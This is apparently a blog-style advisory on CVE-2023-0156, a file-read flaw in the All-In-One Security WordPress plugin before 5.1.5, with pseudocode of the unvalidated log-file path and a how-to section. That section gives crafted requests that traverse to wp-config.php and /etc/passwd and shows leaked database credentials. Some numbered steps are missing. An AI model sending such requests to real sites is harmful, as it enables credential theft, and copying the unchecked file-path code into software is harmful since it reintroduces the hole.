CVE-2023-0156 - Arbitrary File Read Vulnerability in All-In-One Security (AIOS) WordPress Plugin (Pre-5.1.5) – How Attackers Can Peek Inside Your Server

Summary:  
CVE-2023-0156 is a major security issue discovered in the popular All-In-One Security (AIOS) WordPress plugin, affecting versions before 5.1.5. This vulnerability allows an authorized user (admin and above) to read any file, and even browse directories, anywhere on the server that the web server account can access. While the plugin will only display the last 50 lines of any chosen file, this is still a significant leak, especially for sensitive files like wp-config.php or /etc/passwd. This post explains how the vulnerability works, includes code snippets, and demonstrates how an attacker can exploit it.

What is All-In-One Security (AIOS)?

All-In-One Security (AIOS) is a widely used WordPress plugin that helps site owners secure their websites with a collection of features, including login lockdowns, firewall options, and log viewing.

- Official site: https://aiosecurity.com
- WordPress plugin page: https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/

The Problem

In how AIOS provides access to log files for review, there is no restriction on which files an admin-level user can view. The file path is taken from a user-provided parameter, and not limited to just the plugin or WordPress log files. As a result, anyone with enough privileges (usually administrators or higher) can ask the plugin to display any file the web server can read. The output is truncated to the last 50 lines, but files like wp-config.php are often short enough for this to include everything.

Navigate to the log viewing or settings page, where a file path can be selected (or manipulated).

3. Modify the request (for example, using browser devtools or a tool like Burp Suite) to set the file name/path as /etc/passwd (Linux servers), wp-config.php, or even /var/www/html/.env.

Here is a *simplified* and *pseudocode* example of what the issue looks like

// Inside the plugin's file view handling function
$file_to_read = $_REQUEST['log_file'];
if (file_exists($file_to_read)) {
    $lines = file($file_to_read); // Loads file into array, one item per line
    $lines_to_show = array_slice($lines, -50); // Only show last 50 lines
    foreach ($lines_to_show as $line) {
        echo htmlspecialchars($line) . "
";
    }
} else {
    echo "File not found.";
}

The missing step:
There is NO check that $file_to_read points to a log file inside an expected directory. A user could supply ../../../wp-config.php or /etc/passwd.

How to Exploit CVE-2023-0156

Warning:  
This is for educational purposes only. Never test on servers you do not own or have explicit permission to audit.

Go to the plugin’s Logs or Debug tools menu.

3. Intercept the network request made when selecting a log file, using your browser's developer tools (Network tab) or an intercepting proxy.
4. Change the file selection (or manually send a crafted POST/GET request) for the log file parameter, e.g.:

POST /wp-admin/admin.php?page=aiowpsec_logs HTTP/1.1
Host: yoursite.com
...
log_file=../../../../wp-config.php

The response will include the last 50 lines of the chosen file.

Some log viewing interfaces may expect a full path, so you could try direct paths such as /etc/passwd.

Let’s say you want to leak the database password from wp-config.php

GET /wp-admin/admin.php?page=aiowpsec_logs&log_file=../../wp-config.php HTTP/1.1
Host: vulnerable-target.com
Cookie: wordpress_logged_in=...

The response contains

<?php
define('DB_NAME', 'wordpress_db');
define('DB_USER', 'wpuser');
define('DB_PASSWORD', 'SuperSecretP@sswrd');
...

Online shop: Grab payment gateway secrets from config files

- Leak the list of server users (/etc/passwd), especially on badly configured servers

Only an authenticated user with at least admin privileges can use this.

- Often combined with privilege escalation or phishing attacks: If the attacker gets admin, they now also get a file browser.

Patch Status

The flaw was fixed in version 5.1.5.  
- Official changelog
- Wordfence Advisory

Upgrade Now!  
If you use All-In-One Security, update to the latest version immediately!

Further Reading

- CVE-2023-0156 at NVD (National Vulnerability Database)
- Plugin Vulnerabilities Listing
- Patch Diff on GitHub (example)

Conclusion

CVE-2023-0156 is an example of how easily a helpful “view log file” feature can become a security risk if developers forget to validate input. Even though this issue is restricted to admins, it provides a dangerous file-read primitive that can help attackers escalate attacks or steal sensitive information.

Stay safe: Always keep your plugins updated, restrict admin access, and review log viewing features carefully!


*Have you updated your security plugins recently? Double-check today!*

Timeline

Published on: 04/10/2023 14:15:00 UTC
Last modified on: 04/14/2023 03:54:00 UTC